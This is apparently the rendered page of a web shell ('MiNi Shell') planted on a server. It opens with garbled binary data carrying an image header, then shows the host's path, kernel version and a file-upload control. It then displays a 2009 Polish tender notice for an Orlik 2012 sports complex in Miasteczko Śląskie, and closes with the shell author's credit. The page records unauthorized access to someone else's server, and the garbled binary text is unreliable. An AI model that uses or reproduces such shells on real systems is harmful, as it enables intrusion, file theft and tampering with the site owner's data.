JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/116528-N-2009.html

<p class="kh_header"><b>Miasteczko Śląskie: Budowa kompleksu sportowego Moje boisko - ORLIK 2012 w Miasteczku Śląskim</b><br>
<b>Numer ogłoszenia: 116528 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Miasteczku Śląskim , ul. Rynek 8, 42-610 Miasteczko Śląskie, woj. śląskie, tel. 032 393 80 01, faks 032 393 80 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasteczko-slaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego Moje boisko - ORLIK 2012 w Miasteczku Śląskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane w zakresie wykonania na terenie Gminy Miasteczko Śląskie zadania inwestycyjnego pn. Budowa kompleksu sportowego Moje boisko - ORLIK 2012 w Miasteczku Śląskim.
2. Przedmiot zamówienia obejmuje:
2.1. Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0 m o pow. całkowitej 1860 m2 (pole gry 26,0 x 56,0 m)
- podbudowa przepuszczalna,
- nawierzchnia do piłki nożnej - sztuczna trawa.

Wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie z trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport)
1. Typ włókna: monofil,
2. Skład chemiczny włókna: polietylen,
3. Ciężar włókna: min. 14.000 Dtex,
4. Gęstość trawy: min. 170.000 włókien /m2,
5. Wypełnienie: piasek kwarcowy, granulat gumowy (zgodnie z kartą techniczną),
6. Kolor nawierzchni: zielony,
7. Linie: wklejone w nawierzchnię - białe.
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej.
- Obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową.
- Wyposażenie:
- bramki aluminiowe mocowane w tulejach - 2 sztuki,
- siatki do bramek - 2 sztuki.

2.2. Budowę boiska wielofunkcyjnego o wymiarach 19,1 m x 32,1 m o powierzchni 613,11 m2 (pole do gry 15,1 x 28,1 m).
Podbudowa: przepuszczalna
- geowłóknina,
- warstwa odsączająca z piasku płukanego 0÷5,
- tłuczeń 32÷64 mm,
- tłuczeń 0÷32 mm,
- kliniec 0÷5 mm,
- płyta betonowa z betonu jamistego (zdylatowana polami o powierzchni max. 25 m2).
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej.
Roboty należy wykonać zgodnie z dokumentacją projektową.
Nawierzchnia boiska wielofunkcyjnego:
Dwuwarstwowa natryskowa nawierzchnia poliuretanowa o właściwościach i technologii układania określonych w dokumentacji projektowej.
Technologie układania nawierzchni:
Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody wykonana dwuwarstwowo. Podkładowa warstwa elastyczna uzyskana z zmieszania granulatu gumowego SBR frakcja 1÷4 mm z kompozycją spoiwa do granulatów. Dolna warstwa z granulatu SBR min. 10 mm.
Użytkowa wierzchnia warstwa nośna z mieszanki kompozytowej (dwuskładnikowego systemu natryskowego) i granulatu EPDM (EPDM - granulat gumowy frakcji 0,5÷1,5 mm). Nawierzchnia wykonana z nałożenia dwóch warstw mieszanki o łącznej grubości nie mniejszej niż 2 mm.
Wyposażenie do piłki koszykowej:
- obręcz do koszykówki standard i siatka łańcuchowa do obręczy - 2 sztuki,
- tablica do koszykówki epoksydowa o wym. 105 cm x 180 cm - 2 sztuki,
- mechanizm regulacji wysokości - 2 sztuki,
- konstrukcja do koszykówki jednosłupowa, montowana w tulejach - 2 sztuki.
Wyposażenie do piłki siatkowej:
- słupki   do   siatkówki,   aluminiowe  wielofunkcyjne  (badminton,  tenis,  siatkówka) - 2 sztuki,
- siatka do siatkówki - 1 sztuka.
Wyposażenie do piłki ręcznej:
- bramki aluminiowe mocowane w tulejach - 2 sztuki,
- siatki do bramek - 2 sztuki.

2.3. Ogrodzenie terenu i piłkochwyty
Ogrodzenie boiska zaprojektowano jako systemowe na podmurówce betonowej lub na ścianie oporowej. Słupki stalowe w rozstawie, co ok. 250 cm. W ogrodzeniu boisk zaprojektowano 1 furtkę i bramę wjazdową, dodatkowo w piłkochwytach - 2 furtki. Wysokość ogrodzenia - 4 m, wysokość piłkochwytów - 6 m.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.4. Oświetlenie terenu
Oświetlenie obiektu będą stanowiły projektory zamocowane na 10 masztach o wysokości min. 9 m.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.5. Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe) - kostka betonowej gr. min 6 cm, na podbudowie z geowłókniny, piasku i kruszywa, zamknięta obrzeżem betonowym 8 x 25 x 100 cm. Obrzeża chodnikowe ułożyć na podbudowie cementowo-piaskowej.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.6. Ciąg pieszo-jezdny
Ciąg pieszo-jezdny w granicach działki wykonać z kostki betonowej gr. 8 cm na podbudowie z geowłókniny, piasku i kruszywa, zamknięta obrzeżem betonowym 8 x 25 x 100 cm. Obrzeża chodnikowe ułożyć na podbudowie cementowo-piaskowej. Od strony ul. Sportowej zabudować bramę wjazdowa wyposażoną w zamknięcia.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.7. Fundamenty pod budynek zaplecza socjalnego
Fundamenty i roboty związane z ich wykonaniem należy wykonać zgodnie z dokumentacją projektową.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.8. Instalacja kanalizacji deszczowej
Odprowadzanie wód opadowych z kompleksu sportowego nastąpi poprzez dwie studzienki inspekcyjne O 600 mm drenażem z rur drenarskich perforowanych:
- PVC O 65 mm,
- PVC O 145 mm,
- PVC O 126 mm,
do studni chłonnej wykonanej z kręgów betonowych O 1000 mm.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.9. Instalacja kanalizacji sanitarnej
Odprowadzanie ścieków komunalnych z zaplecza sanitarno-szatniowego za pomocą rur PVC-U O 160 mm poprzez dwie studzienki inspekcyjne O 425 mm do istniejącej studzienki rewizyjnej włazowej O 1200 mm zabudowanej w ul. Sportowej.
Szczegółowe rozwiązania wg dokumentacji projektowej.

2.10. Instalacja wodociągowa wody zimnej
Doprowadzanie wody do zaplecza sanitarno-szatniowego za pomocą rur PE-HD O 50 mm, SDR17, PN10 poprzez studzienkę wodomierzową. Włączenie do sieci wodociągowej biegnącej w ul. Sportowej za pomocą opaski do nawiercania na rurę żeliwną z odejściem gwintowanym 2 cal.
Szczegółowe rozwiązania wg dokumentacji projektowej.
2.11. Budynek zaplecza sportowego:
Instalacja wodociągowa wody zimnej
Dla celów sanitarno-szatniowych przewidziano budynek sanitarno-szatniowy STANDARD+ o następujących parametrach:
- powierzchnia zabudowy 84,86 m2,
- powierzchnia użytkowa podstawowa 58,20 m2,
- powierzchnia konstrukcji 12,00 m2,
- kubatura 280,04 m3.
Pawilon posadowiony jest na kręgach betonowych O 60 cm. Pawilon posiada: 
- pomieszczenie trenera,
- magazyn, 
- dwa sanitariaty,
- dwie przebieralnie z łazienkami.
Pawilon wyposażony jest w instalacje:
- wodno-ściekowa,
- elektryczna,
- ogrzewanie elektryczne,
- wentylacja nawiewno-wywiewna.
3. Szczegółowy opis przedmiotu zamówienia (część D SIWZ) stanowi dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest obowiązany wnieść wadium w wysokości: 30.000,00 zł (słownie: trzydzieści tysięcy złotych) przed upływem terminu składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca przystępujący do przetargu musi spełniać warunki udziału w postępowaniu określone w SIWZ oraz w art. 22 ust. 1 ustawy Pzp, jak też nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
2. W oparciu o powyższe Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
2.1. Wykonawca musi dysponować osobą lub osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi potwierdzone przygotowanie zawodowe do wykonywania samodzielnych funkcji technicznych w zakresie kierowania, nadzorowania i kontroli robót w specjalności:
- drogowej lub konstrukcyjno - budowlanej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

2.2. Wykonawca musi wykazać się doświadczeniem zawodowym polegającym na tym, że w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie roboty budowlane odpowiadające rodzajem i wartością przedmiotowi zamówienia. Przez roboty budowlane odpowiadające rodzajem i wartością Zamawiający rozumie roboty budowlane polegające na budowie lub rozbudowie boisk sportowych z budynkiem zaplecza, w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową o wartości 1.000.000,00 zł (brutto) każda.

2.3. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia na kwotę nie mniejszą niż 1.000.000,00 zł.

UWAGA! Jeśli Wykonawcy przedstawią w swych ofertach wymagane wartości finansowe w innych walutach niż określone w SIWZ, to będą one przeliczone wg średniego kursu PLN Narodowego Banku Polskiego (NBP) z dnia ukazania się ogłoszenia o zamówieniu publicznym dla niniejszego postępowania.
UWAGA! Ocena spełnienia powyższych warunków będzie dokonywana metodą spełniania albo nie spełniania, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty. Wykonawcy nie spełniający powyższych warunków zostaną przez Zamawiającego wykluczeni z niniejszego postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Pzp oraz warunków określonych w punkcie VI SIWZ, od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest przedstawienie następujących dokumentów:
1.1. Oświadczenia zgodnie z wymaganiami art. 22 ust. 1 ustawy Pzp - ZAŁĄCZNIK NR 1 do formularza oferty.
1.2. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3. Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.4. Wykaz osób zdolnych do wykonania zamówienia, którymi dysponuje lub będzie dysponował Wykonawca wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z dokumentami stwierdzającymi, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia konieczne do realizacji przedmiotu zamówienia, tj. uprawnienia w wymaganej specjalności, a także aktualny dokument potwierdzający przynależność do właściwej izby samorządu zawodowego - wzór ZAŁĄCZNIK NR 2 do formularza oferty.
Jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował, składa     pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do  wykonania zamówienia - wg wzoru ZAŁĄCZNIKA NR 2 do formularza oferty.
1.5. Wykaz wykonanych robót budowlanych (oświadczenie) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z dokumentami potwierdzającymi (uprzednich zamawiających), że wykazane roboty zostały wykonane należycie - wzór ZAŁĄCZNIK NR 3 do formularza oferty.
1.6. Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wymaganej kwocie.
1.7. Kosztorys ofertowy uproszczony.
1.8. Oświadczeń lub dokumentów odpowiadających wymaganiom określonym przez Zamawiającego i potwierdzających spełnianie warunków jakościowych:

A. Dokumenty dotyczące nawierzchni poliuretanowej:
1. Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub
aprobata techniczna ITB, lub
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3. Atest PZH dla oferowanej nawierzchni.
4. Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

B. Dokumenty dotyczące nawierzchni z trawy syntetycznej:
1. Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
2. Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny.
3. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4. Atest PZH dla oferowanej nawierzchni.
5. Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miasteczko-slaskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Miasteczku Śląskim, 42-610 Miasteczko Śląskie, ul. Rynek 8, pokój nr 26.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2009 godzina 10:00, miejsce: Urząd Miejski w Miasteczku Śląskim, 42-610 Miasteczko Śląskie, ul. Rynek 8, pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com